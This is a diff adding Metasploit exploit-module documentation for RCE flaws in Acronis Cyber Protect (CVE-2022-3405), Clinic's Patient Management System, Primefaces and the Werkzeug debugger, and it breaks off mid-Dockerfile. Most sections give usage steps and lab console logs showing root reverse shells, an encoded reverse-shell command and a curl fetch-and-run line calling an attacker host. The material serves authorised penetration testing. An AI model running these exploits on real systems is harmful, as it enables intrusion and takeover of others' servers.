+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `modules/exploits/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `exploit`
+- [ ] you should get a `shell` or `meterpreter` session depending on your settings.
+
+## Options
+These three options below are needed to target an specific endpoint registered on the Acronis Protect/Backup appliance.
+This information can be collected using the recon module `auxiliary/gather/acronis_cyber_protect_machine_info_disclosure`.
+This information is not mandatory for the module to run successfully.
+You can also run this module standalone and it will try to exploit the first online endpoint matching your target
+and payload settings configured at the module.
+### HOSTID
+HostId value collected from the recon module `auxiliary/gather/acronis_cyber_protect_machine_info_disclosure`.
+### KEY
+Key value collected from the recon module `auxiliary/gather/acronis_cyber_protect_machine_info_disclosure`.
+### PARENTID
+ParentId value collected from the recon module `auxiliary/gather/acronis_cyber_protect_machine_info_disclosure`.
+### OUTPUT
+You can use option `none` where no information is stored or printed to the console (default).
+Choosing option `json` will store all information at a file in `json` format at the loot directory.
+You can use this file in combination with `jq` for offline queries and processing.
+
+## Scenarios
+```msf
+msf6 exploit(multi/acronis_cyber_protect_unauth_rce_cve_2022_3405) > info
+
+       Name: Acronis Cyber Protect/Backup remote code execution
+     Module: exploit/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405
+   Platform: Unix, Linux, Windows
+       Arch: cmd
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2022-11-08
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Sandro Tolksdorf of usd AG.
+
+Module side effects:
+ artifacts-on-disk
+ ioc-in-logs
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Unix/Linux Command
+      1   Windows Command
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  HOSTID                      no        hostId value collected from recon module "auxiliary/gather/a
+                                        cronis_cyber_protect_machine_info_disclosure"
+  KEY                         no        key value collected from recon module "auxiliary/gather/acro
+                                        nis_cyber_protect_machine_info_disclosure"
+  OUTPUT     none             yes       Output format to use (Accepted: none, json)
+  PARENTID                    no        parentId value collected from recon module "auxiliary/gather
+                                        /acronis_cyber_protect_machine_info_disclosure"
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/usi
+                                        ng-metasploit/basics/using-metasploit.html
+  RPORT      9877             yes       The target port (TCP)
+  SSL        true             no        Negotiate SSL/TLS for outgoing connections
+  TARGETURI  /                yes       The URI of the vulnerable Acronis Cyber Protect/Backup insta
+                                        nce
+  VHOST                       no        HTTP server virtual host
+
+Payload information:
+
+Description:
+  Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all,
+  compute, storage and application resources. Businesses and Service Providers are using it
+  to protect and backup all IT assets in their IT environment.
+  The Acronis Cyber Protect appliance, in its default configuration, allows the anonymous
+  registration of new protect/backup agents on new endpoints. This API endpoint also
+  generates bearer tokens which the agent then uses to authenticate to the appliance.
+  As the management web console is running on the same port as the API for the agents, this
+  bearer token is also valid for any actions on the web console. This allows an attacker
+  with network access to the appliance to start the registration of a new agent, retrieve a
+  bearer token that provides admin access to the available functions in the web console.
+
+  The web console contains multiple possibilities to execute arbitrary commands on both the
+  agents (e.g., via PreCommands for a backup) and also the appliance (e.g., via a Validation
+  job on the agent of the appliance). These options can easily be set with the provided bearer
+  token, which leads to a complete compromise of all agents and the appliance itself.
+
+  You can either use the module `auxiliary/gather/acronis_cyber_protect_machine_info_disclosure`
+  to collect target info for exploitation in this module. Or just run this module standalone and
+  it will try to exploit the first online endpoint matching your target and payload settings
+  configured at the module.
+
+  Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and
+  Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2022-3405
+  https://herolab.usd.de/security-advisories/usd-2022-0008/
+  https://attackerkb.com/topics/WVI3r5eNIc/cve-2022-3405
+
+
+View the full module info with the info -d command.
+```
+### Acronis Cyber Backup 12.5 build 14330 VMware appliance - Linux target
+```msf
+msf6 exploit(multi/acronis_cyber_protect_unauth_rce_cve_2022_3405) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 exploit(multi/acronis_cyber_protect_unauth_rce_cve_2022_3405) > set target 0
+target => 0
+msf6 exploit(multi/acronis_cyber_protect_unauth_rce_cve_2022_3405) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/acronis_cyber_protect_unauth_rce_cve_2022_3405) > set FETCH_SRVHOST 192.168.201.8
+FETCH_SRVHOST => 192.168.201.8
+msf6 exploit(multi/acronis_cyber_protect_unauth_rce_cve_2022_3405) > set FETCH_WRITABLE_DIR /tmp
+FETCH_WRITABLE_DIR => /tmp
+msf6 exploit(multi/acronis_cyber_protect_unauth_rce_cve_2022_3405) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Retrieve the first access token.
+[*] Register a dummy backup agent.
+[*] Dummy backup agent registration is successful.
+[*] Retrieve the second access token.
+[+] The target appears to be vulnerable. Acronis Cyber Protect/Backup 12.5.14330
+[*] Retrieve first online target registered at the Acronis Cyber Protect/Backup appliance.
+[*] Found online target matching your target setting Unix/Linux Command.
+[+] hostId: 345C3F1E-92C3-4E92-8EF8-AC6BF136BB83
+[+] parentId: phm-group.7C2057CC-8D32-40CA-9B83-4A8E73078F7F.disks
+[+] key: phm.F70D1B08-5097-4CE5-8E22-F9E0DB75401F@345C3F1E-92C3-4E92-8EF8-AC6BF136BB83.disks
+[*] type: machine
+[*] hostname: AcronisAppliance-AC319
+[*] IP: 192.168.201.6
+[*] OS: GNU/Linux
+[*] ARCH: linux
+[*] ONLINE: true
+[*] Import backup plan with payload for target with hostId: 345C3F1E-92C3-4E92-8EF8-AC6BF136BB83.
+[*] Executing Unix/Linux Command with payload cmd/linux/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (3045380 bytes) to 192.168.201.6
+[*] Meterpreter session 22 opened (192.168.201.8:4444 -> 192.168.201.6:60862) at 2024-10-23 12:35:44 +0000
+[+] Backup plan is successful removed.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.201.6
+OS           : CentOS 7.4.1708 (Linux 3.10.0-693.11.6.el7.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
+/var/lib/Acronis/mms
+meterpreter >
+```
+### Acronis Cyber Backup 12.5 build 14330 VMware appliance - Windows target
+```msf
+msf6 exploit(multi/acronis_cyber_protect_unauth_rce_cve_2022_3405) > set target 1
+target => 1
+msf6 exploit(multi/acronis_cyber_protect_unauth_rce_cve_2022_3405) > set output json
+output => json
+msf6 exploit(multi/acronis_cyber_protect_unauth_rce_cve_2022_3405) > set payload cmd/windows/reverse_powershell
+payload => cmd/windows/reverse_powershell
+msf6 exploit(multi/acronis_cyber_protect_unauth_rce_cve_2022_3405) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Retrieve the first access token.
+[*] Register a dummy backup agent.
+[*] Dummy backup agent registration is successful.
+[*] Retrieve the second access token.
+[+] The target appears to be vulnerable. Acronis Cyber Protect/Backup 12.5.14330
+[*] Retrieve first online target registered at the Acronis Cyber Protect/Backup appliance.
+[+] Configuration details are successfully saved in json format to /root/.msf4/loot/20241023124641_default_192.168.201.6_acronis.cyber.pr_949551.bin
+[*] Found online target matching your target setting Windows Command.
+[+] hostId: 28BAFD9F-F9F1-481F-A970-1A6ED70736AC
+[+] parentId: phm-group.7C2057CC-8D32-40CA-9B83-4A8E73078F7F.disks
+[+] key: phm.0CA16CD4-1C6D-44D2-BEF1-B9F146005EE1@28BAFD9F-F9F1-481F-A970-1A6ED70736AC.disks
+[*] type: machine
+[*] hostname: WIN-BJDNH44EEDB
+[*] IP: 192.168.201.5
+[*] OS: Microsoft Windows Server 2019 Standard
+[*] ARCH: windows
+[*] ONLINE: true
+[*] Import backup plan with payload for target with hostId: 28BAFD9F-F9F1-481F-A970-1A6ED70736AC.
+[*] Executing Windows Command with payload cmd/windows/reverse_powershell
+[*] Command shell session 23 opened (192.168.201.8:4444 -> 192.168.201.5:49780) at 2024-10-23 12:46:51 +0000
+[+] Backup plan is successful removed.
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.17763.107]
+-----
+
+
+C:\Windows\system32>whoami
+whoami
+nt authority\system
+
+C:\Windows\system32>systeminfo
+systeminfo
+
+Host Name:                 WIN-BJDNH44EEDB
+OS Name:                   Microsoft Windows Server 2019 Standard
+OS Version:                10.0.17763 N/A Build 17763
+OS Manufacturer:           Microsoft Corporation
+OS Configuration:          Standalone Server
+OS Build Type:             Multiprocessor Free
+Registered Owner:          Windows User
+Registered Organization:
+Product ID:                00429-70000-00000-AA946
+Original Install Date:     1/26/2023, 10:05:52 AM
+System Boot Time:          10/23/2024, 2:44:05 PM
+System Manufacturer:       innotek GmbH
+System Model:              VirtualBox
+System Type:               x64-based PC
+Processor(s):              1 Processor(s) Installed.
+                           [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~2307 Mhz
+BIOS Version:              innotek GmbH VirtualBox, 12/1/2006
+Windows Directory:         C:\Windows
+System Directory:          C:\Windows\system32
+Boot Device:               \Device\HarddiskVolume1
+System Locale:             en-us;English (United States)
+Input Locale:              en-us;English (United States)
+Time Zone:                 (UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna
+Total Physical Memory:     2,048 MB
+Available Physical Memory: 475 MB
+Virtual Memory: Max Size:  4,224 MB
+Virtual Memory: Available: 2,800 MB
+Virtual Memory: In Use:    1,424 MB
+Page File Location(s):     C:\pagefile.sys
+Domain:                    WORKGROUP
+Logon Server:              N/A
+Hotfix(s):                 1 Hotfix(s) Installed.
+                           [01]: KB4464455
+Network Card(s):           1 NIC(s) Installed.
+                           [01]: Intel(R) PRO/1000 MT Desktop Adapter
+                                 Connection Name: Ethernet
+                                 DHCP Enabled:    No
+                                 IP address(es)
+                                 [01]: 192.168.201.5
+                                 [02]: fe80::85ec:4690:3774:2b6b
+                                 [03]: fdf7:94fa:75b3:fe44:85ec:4690:3774:2b6b
+Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
+
+C:\Windows\system32>
+```
+### Acronis Cyber Backup 15 build 27009 VMware appliance - Linux target
+```msf
+msf6 exploit(multi/acronis_cyber_protect_unauth_rce_cve_2022_3405) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 exploit(multi/acronis_cyber_protect_unauth_rce_cve_2022_3405) > set target 0
+target => 0
+msf6 exploit(multi/acronis_cyber_protect_unauth_rce_cve_2022_3405) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf6 exploit(multi/acronis_cyber_protect_unauth_rce_cve_2022_3405) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Retrieve the first access token.
+[*] Register a dummy backup agent.
+[*] Dummy backup agent registration is successful.
+[*] Retrieve the second access token.
+[+] The target appears to be vulnerable. Acronis Cyber Protect/Backup 15.0.27009
+[*] Retrieve first online target registered at the Acronis Cyber Protect/Backup appliance.
+[*] Found online target matching your target setting Unix/Linux Command.
+[+] hostId: D287E868-EDBB-4FE9-85A9-F928AA10EE5D
+[+] parentId: 00000000-0000-0000-0000-000000000000
+[+] key: phm.EA9A6E26-38B5-4727-9957-FD7CDD7BF2CC@D287E868-EDBB-4FE9-85A9-F928AA10EE5D.disks
+[*] type: machine
+[*] hostname: AcronisAppliance-FCD94
+[*] IP: 192.168.201.6
+[*] OS: Linux: CentOS Linux release 7.6.1810 (Core)
+[*] ARCH: linux
+[*] ONLINE: true
+[*] Import backup plan with payload for target with hostId: D287E868-EDBB-4FE9-85A9-F928AA10EE5D.
+[*] Executing Unix/Linux Command with payload cmd/unix/reverse_bash
+[*] Command shell session 21 opened (192.168.201.8:4444 -> 192.168.201.6:35722) at 2024-10-23 12:20:05 +0000
+[+] Backup plan is successful removed.
+
+uname -a
+Linux AcronisAppliance-FCD94 3.10.0-957.27.2.el7.x86_64 #1 SMP Mon Jul 29 17:46:05 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+id
+uid=0(root) gid=0(root) groups=0(root)
+pwd
+/var/lib/Acronis/mms
+```
+
+## Limitations
+In some occasions, the exploit might fail.
+Adjust the `WfsDelay` advanced option might help.
@@ -0,0 +1,116 @@
+## Vulnerable Application
+The Clinic's Patient Management System (CPMS) 1.0 is vulnerable to Unauthenticated Remote Code Execution (RCE) due to a file upload vulnerability.
+This exploit allows an attacker to upload arbitrary files, such as a PHP web shell, which can then be executed remotely.
+The exploitation occurs because of a misconfiguration in the server, specifically a lack of file validation for uploads and the presence of
+a directory listing feature in `/pms/user_images`.
+This enables an attacker to upload a PHP file and access it via a publicly accessible URL, executing arbitrary PHP code.
+
+## Verification Steps
+
+### Vulnerable Application Installation Setup
+1. Install Clinic's Patient Management System 1.0 on your web server.
+   - Download the Web Application from [here](https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code)
+	- For **Windows**
+		- [ ] Open your XAMPP Control Panel and start Apache and MySQL.
+		- [ ] Extract the downloaded source code zip file.
+		- [ ] Copy the extracted source code folder and paste it into the XAMPP's "htdocs" directory.
+		- [ ] Browse the PHPMyAdmin in a browser. i.e. http://localhost/phpmyadmin
+		- [ ] Create a new database naming `pms_db`.
+		- [ ] Import the provided SQL file. The file is known as pms_db.sql located inside the database folder.
+		- [ ] Browse the Clinic Patient Management System in a browser. i.e. http://localhost/pms/
+
+	- For **Linux**
+		- [ ] Start Apache2 & MySQL with the command `sudo systemctl start apache2 && sudo systemctl start mysql`
+		- [ ] Install PHPMyAdmin with the command `sudo apt install phpmyadmin -y`
+		- [ ] Edit `/etc/apache2/apache2.conf` by appending this line: `Include /etc/phpmyadmin/apache.conf`
+		- [ ] Extract the downloaded source code zip file into "/var/www/html" directory
+		- [ ] Next steps are similar to the ones for Windows, so follow that
+
+2. Start `msfconsole` and load the exploit module:
+```bash
+   msfconsole
+   use exploit/multi/http/clinic_pms_fileupload_rce
+```
+
+3. Set the required options:
+```bash
+   set rport <port>
+   set rhost <ip>
+   set targeturi /pms
+```
+
+4. Check if the target is vulnerable:
+```bash
+   check
+```
+
+   If the target is vulnerable, you will see a message indicating that the target is susceptible to the exploit:
+```
+   [+] <IP> The target is vulnerable.
+```
+
+5. Set up the listener for the exploit:
+```bash
+   set lport <port>
+   set lhost <ip>
+```
+
+6. Launch the exploit:
+```bash
+   exploit
+```
+
+7. If successful, you will receive a PHP Meterpreter shell.
+
+## Options
+- `TARGETURI`: (Required) The base path to the Clinic Patient Management System (default: `/pms`).
+- `LISTING_DELAY`: (Optional) The time to wait before fetching the directory listing after uploading the shell (default: `2` seconds).
+
+
+## Scenarios
+
+### Clinic's Patient Management System on a Linux Target
+```bash
+msf exploit(multi/http/clinic_pms_fileupload_rce) > check
+[*] Checking if target is vulnerable...
+[+] 127.0.0.1:80 - The target is vulnerable.
+
+msf exploit(multi/http/clinic_pms_fileupload_rce) > exploit
+[*] Started reverse TCP handler on 192.168.1.104:4444 
+[*] Detected OS: linux
+[*] Target is Linux/Unix. Using PHP Meterpreter payload with unlink_self.
+[*] Uploading PHP Meterpreter payload as zuX7FDRe.php...
+[+] Payload uploaded successfully!
+[*] Executing the uploaded shell at /pms/user_images/1734340436zuX7FDRe.php...
+[*] Sending stage (40004 bytes) to 192.168.1.104
+[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.104:48290) at 2024-12-16 14:43:59 +0530
+
+meterpreter > sysinfo
+Computer    : kali
+OS          : Linux kali 6.11.2-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.11.2-1kali1 (2024-10-15) x86_64
+Meterpreter : php/linux
+meterpreter >
+```
+
+### Clinic's Patient Management System on a Windows Target
+```bash
+msf exploit(multi/http/clinic_pms_fileupload_rce) > check
+[*] Checking if target is vulnerable...
+[+] 192.168.1.103:80 - The target is vulnerable.
+
+msf exploit(multi/http/clinic_pms_fileupload_rce) > exploit
+[*] Started reverse TCP handler on 192.168.1.104:4444 
+[*] Detected OS: winnt
+[*] Target is Windows. Using standard PHP Meterpreter payload.
+[*] Uploading PHP Meterpreter payload as lgTprVq5.php...
+[+] Payload uploaded successfully!
+[*] Executing the uploaded shell at /pms/user_images/1734341267lgTprVq5.php...
+[*] Sending stage (40004 bytes) to 192.168.1.103
+[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.103:60615) at 2024-12-16 14:57:43 +0530
+
+meterpreter > sysinfo
+Computer    : DESKTOP-VE9J36K
+OS          : Windows NT DESKTOP-VE9J36K 10.0 build 19045 (Windows 10) AMD64
+Meterpreter : php/windows
+meterpreter >
+```
@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+This module exploits an expression language remote code execution flaw in the Primefaces JSF framework.
+Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack,
+due to the use of weak crypto and default encryption password and salt.
+
+Tested against Docker image with Tomcat 7.0 with the Primefaces 5.2 showcase application. The following payloads worked in the docker image:
+
+* `payload/cmd/unix/reverse_jjs`
+* `payload/cmd/unix/reverse_openssl`
+* `payload/cmd/unix/reverse_perl`
+* `payload/cmd/unix/reverse_python` 
+* `payload/cmd/unix/reverse_python_ssl`
+
+### Docker Image
+
+1. `git clone https://github.com/pimps/CVE-2017-1000486`
+2. `cd CVE-2017-1000486/`
+3. `docker build . -t primefaces`
+4. `docker run -p 8090:8080 -t primefaces`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/multi/http/primefaces_weak_encryption_rce`
+1. Do: `set rhosts <ip>`
+1. Do: `set verbose true`
+1. Do: `set payload payload/cmd/unix/reverse_jjs`
+1. You should get a shell.
+
+## Options
+
+### PASSWORD
+
+The password to login. Defaults to `primefaces`
+
+## Scenarios
+
+### Docker image with Tomcat 7.0 with the Primefaces 5.2 Showcase application
+
+CMD payload
+
+```
+msf6 > use exploit/multi/http/primefaces_weak_encryption_rce
+[*] No payload configured, defaulting to cmd/unix/reverse_netcat
+msf6 exploit(linux/http/primefaces_weak_encryption_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(linux/http/primefaces_weak_encryption_rce) > set rport 8090
+rport => 8090
+msf6 exploit(linux/http/primefaces_weak_encryption_rce) > set verbose true
+verbose => true
+msf6 exploit(linux/http/primefaces_weak_encryption_rce) > set payload payload/cmd/unix/reverse_jjs
+payload => cmd/unix/reverse_jjs
+msf6 exploit(linux/http/primefaces_weak_encryption_rce) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Victim evaluates Expression Language expressions
+[*] Attempting to execute: echo ZWNobyAiZXZhbChuZXcgamF2YS5sYW5nLlN0cmluZyhqYXZhLnV0aWwuQmFzZTY0LmRlY29kZXIuZGVjb2RlKCdkbUZ5SUZCeWIyTmxjM05DZFdsc1pHVnlQVXBoZG1FdWRIbHdaU2dpYW1GMllTNXNZVzVuTGxCeWIyTmxjM05DZFdsc1pHVnlJaWs3ZG1GeUlIQTlibVYzSUZCeWIyTmxjM05DZFdsc1pHVnlLQ0l2WW1sdUwzTm9JaWt1Y21Wa2FYSmxZM1JGY25KdmNsTjBjbVZoYlNoMGNuVmxLUzV6ZEdGeWRDZ3BPM1poY2lCemN6MUtZWFpoTG5SNWNHVW9JbXBoZG1FdWJtVjBMbE52WTJ0bGRDSXBPM1poY2lCelBXNWxkeUJ6Y3lnaU1TNHhMakV1TVNJc05EUTBOQ2s3ZG1GeUlIQnBQWEF1WjJWMFNXNXdkWFJUZEhKbFlXMG9LU3h3WlQxd0xtZGxkRVZ5Y205eVUzUnlaV0Z0S0Nrc2MyazljeTVuWlhSSmJuQjFkRk4wY21WaGJTZ3BPM1poY2lCd2J6MXdMbWRsZEU5MWRIQjFkRk4wY21WaGJTZ3BMSE52UFhNdVoyVjBUM1YwY0hWMFUzUnlaV0Z0S0NrN2QyaHBiR1VvSVhNdWFYTkRiRzl6WldRb0tTbDdkMmhwYkdVb2NHa3VZWFpoYVd4aFlteGxLQ2srTUNsemJ5NTNjbWwwWlNod2FTNXlaV0ZrS0NrcE8zZG9hV3hsS0hCbExtRjJZV2xzWVdKc1pTZ3BQakFwYzI4dWQzSnBkR1VvY0dVdWNtVmhaQ2dwS1R0M2FHbHNaU2h6YVM1aGRtRnBiR0ZpYkdVb0tUNHdLWEJ2TG5keWFYUmxLSE5wTG5KbFlXUW9LU2s3YzI4dVpteDFjMmdvS1R0d2J5NW1iSFZ6YUNncE8wcGhkbUV1ZEhsd1pTZ2lhbUYyWVM1c1lXNW5MbFJvY21WaFpDSXBMbk5zWldWd0tEVXdLVHQwY25sN2NDNWxlR2wwVm1Gc2RXVW9LVHRpY21WaGF6dDlZMkYwWTJnb1pTbDdmWDA3Y0M1a1pYTjBjbTk1S0NrN2N5NWpiRzl6WlNncE93PT0nKSkpOyJ8ampz|((command -v base64 >/dev/null && (base64 --decode || base64 -d)) || (command -v openssl >/dev/null && openssl enc -base64 -d))|sh
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:54104) at 2024-11-14 11:31:01 -0500
+
+whoami
+root
+```
+
+fetch payload
+
+```
+msf6 > use exploit/multi/http/primefaces_weak_encryption_rce
+[*] No payload configured, defaulting to cmd/unix/reverse_netcat
+msf6 exploit(linux/http/primefaces_weak_encryption_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(linux/http/primefaces_weak_encryption_rce) > set rport 8090
+rport => 8090
+msf6 exploit(linux/http/primefaces_weak_encryption_rce) > set verbose true
+verbose => true
+msf6 exploit(linux/http/primefaces_weak_encryption_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp 
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/primefaces_weak_encryption_rce) > exploit
+
+[*] Command to run on remote host: curl -so ./ihPBtpwPCD http://1.1.1.1:8080/aZRe4yWUN3U2-lDtdsaGlA; chmod +x ./ihPBtpwPCD; ./ihPBtpwPCD &
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /aZRe4yWUN3U2-lDtdsaGlA
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Victim evaluates Expression Language expressions
+[*] Attempting to execute: curl -so ./ihPBtpwPCD http://1.1.1.1:8080/aZRe4yWUN3U2-lDtdsaGlA; chmod +x ./ihPBtpwPCD; ./ihPBtpwPCD &
+[*] Client 172.17.0.2 requested /aZRe4yWUN3U2-lDtdsaGlA
+[*] Sending payload to 172.17.0.2 (curl/7.64.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.17.0.2:44312) at 2024-11-14 12:04:14 -0500
+
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Debian 10.10 (Linux 6.11.2-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+```
@@ -1,72 +1,602 @@
 ## Vulnerable Application

-Verified against:
-  + 0.9.6 on Debian
-  + 0.9.6 on Centos
-  + 0.10 on Debian
-  
-A sample application which enables the console debugger is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/werkzeug_console.py)
+### Background
+
+The [Werkzeug](https://werkzeug.palletsprojects.com/)
+[debugger](https://werkzeug.palletsprojects.com/en/3.0.x/debug/) allows
+developers to execute python commands in a web application either when an
+exception is not caught by the application, or via the dedicated console if
+enabled.
+
+Werkzeug is included with [Flask](https://flask.palletsprojects.com/), but the
+debugger is not enabled by default. It is also included in other projects, for
+example
+[RunServerPlus](https://django-extensions.readthedocs.io/en/latest/runserver_plus.html),
+part of [django-extensions](https://django-extensions.readthedocs.io/) and may
+also be used alone.
+
+[The Werkzeug documentation](https://werkzeug.palletsprojects.com/en/3.0.x/debug/)
+states: "*The debugger allows the execution of arbitrary code which makes it a
+major security risk. The debugger must never be used on production machines. We
+cannot stress this enough. Do not enable the debugger in production. Production
+means anything that is not development, and anything that is publicly
+accessible.*"
+
+Additionally,
+[the Flask documentation](https://flask.palletsprojects.com/en/3.0.x/debugging/)
+states: "*Do not run the development server, or enable the built-in debugger, in
+a production environment. The debugger allows executing arbitrary Python code
+from the browser. It’s protected by a pin, but that should not be relied on for
+security.*"
+
+**Of course this doesn't prevent developers from mistakenly enabling it in
+production!**
+
+### Exploit Details
+
+Werkzeug versions 0.10 and older of did not include the PIN security feature,
+therefore if the debugger was enabled then arbitrary code execution could be
+easily achieved. Versions 0.11 and above enable the PIN by default, though it
+can be disabled by the application developer. The format of the PIN is 9
+numerical digits, and can include hyphens (which are ignored by the
+application.) I.e. `123456789` is the same as `123-456-789`. The PIN is logged
+to stdout when the PIN prompt is shown to the user, therefore if access to
+stdout is possible then it may be able to obtain the PIN using that feature.
+
+A custom PIN can be set by the application developer as an environment variable,
+but it is more commonly generated by Werkzeug using an algorithm that is seeded
+by information about the environment that the application is running in.
+
+Therefore, if the debugger or console is enabled and is not protected by a PIN,
+or if it is possible to obtain the PIN, cookie or the required information about
+the environment that the app is running in (e.g. by exploiting a separate path
+traversal bug in the app) then remote Python code execution will be possible.
+
+If the debugger is "secured" with a PIN then, it will be automatically locked
+after 11 unsuccessful authentication attempts, requiring a restart to re-enable
+PIN based authentication. This can be avoided by calculating the value of a
+cookie and sending that to the debugger instead of sending the PIN, which is
+what this module does, unless the Known-PIN method of exploitation is used.
+Furthermore, authentication using a cookie works even if the PIN-based
+authentication method has been locked because of too many failed authentication
+attempts. This means that this exploit will work even if the debugger
+PIN-authentication is locked.
+
+[HackTheBox had a challenge called "Agile"](https://app.hackthebox.com/machines/Agile)
+that required this vulnerability to be exploited in order to gain an initial
+foothold. As a result there are many walkthroughs available online that explain
+how a valid PIN can be generated using
+[the algorithm in the Werkzeug source code](https://github.com/pallets/werkzeug/blob/main/src/werkzeug/debug/__init__.py#L142)
+along with information about the environment. As far as I can tell, none of
+these walkthroughs mention that a cookie can also be generated, and that a
+cookie will bypass a PIN-locked debugger. Neither do they mention that very old
+versions of Werkzeug don't require PIN or that the PIN/cookie generation
+algorithm has changed over time.
+
+To support the different PIN/cookie generation algorithms, this module supports
+multiple different versions of Werkzeug as the target.
+
+It should be noted that version
+[3.0.3 includes a check](https://github.com/pallets/werkzeug/blob/main/src/werkzeug/debug/__init__.py#L309)
+to see ensure that requests that include python code to be executed by the
+debugger must come from localhost or 127.0.0.1. This is done by checking the
+Host HTTP header, and therefore can in some cases be bypassed by setting the
+Host header manually using the VHOST parameter in this module.
+
+## Tested Versions
+
+This module has been verified against the following versions of Werkzeug:
+- 3.0.3  on Debian 12, Windows 11 and macOS 14.6
+- 1.1.4  on Debian 12
+- 1.0.1  on Debian 12
+- 0.11.5 on Debian 12
+- 0.10   on Debian 12
+
+## Sample Vulnerable Application
+
+The following Docker Compose file, Dockerfiles and Python script can be used to
+build and run a set of containers that have the console enabled (at /console)
+and also contains endpoints that cause the application to attempt to read the
+content of a file and include it in the response. These endpoints can be used
+for arbitrary file read, but also for triggering the debugger, for example by
+requesting the content of a file that doesn't exist in the container.
+
+#### compose.yaml
+
+    services:
+      werkzeug-3.0.3:
+        build:
+          dockerfile: werkzeug-3.0.3.Dockerfile
+        ports:
+          - "80:80"
+      werkzeug-1.0.1:
+        build:
+          dockerfile: werkzeug-1.0.1.Dockerfile
+        ports:
+          - "81:80"
+      werkzeug-0.11.5:
+        build:
+          dockerfile: werkzeug-0.11.5.Dockerfile
+        ports:
+          - "82:80"
+      werkzeug-0.10:
+        build:
+          dockerfile: werkzeug-0.10.Dockerfile
+        ports:
+          - "83:80"
+      werkzeug-3.0.3-basicauth-custompin:
+        build:
+          dockerfile: werkzeug-3.0.3-basicauth.Dockerfile
+        environment:
+          WERKZEUG_DEBUG_PIN: 1234
+        ports:
+          - "84:80"
+      werkzeug-3.0.3-noevalex:
+        build:
+          dockerfile: werkzeug-3.0.3.Dockerfile
+        ports:
+          - "85:80"
+        entrypoint:
+          - ./app.py
+          - --no-evalex
+
+#### werkzeug-3.0.3.Dockerfile
+
+    # syntax=docker/dockerfile:1
+    FROM python:3
+    RUN pip install werkzeug==3.0.3 flask==3.0.3
+    COPY report.txt .
+    COPY --chmod=744 app.py .
+    EXPOSE 80
+    ENTRYPOINT ["./app.py"]
+
+#### werkzeug-1.0.1.Dockerfile
+
+    # syntax=docker/dockerfile:1
+    FROM python:2
+    RUN pip install werkzeug==1.0.1 flask==1.1.4
+    COPY report.txt .
+    COPY --chmod=744 app.py .
+    EXPOSE 80
+    ENTRYPOINT ["./app.py"]
+
+#### werkzeug-0.11.5.Dockerfile
+
+    # syntax=docker/dockerfile:1
+    FROM python:2
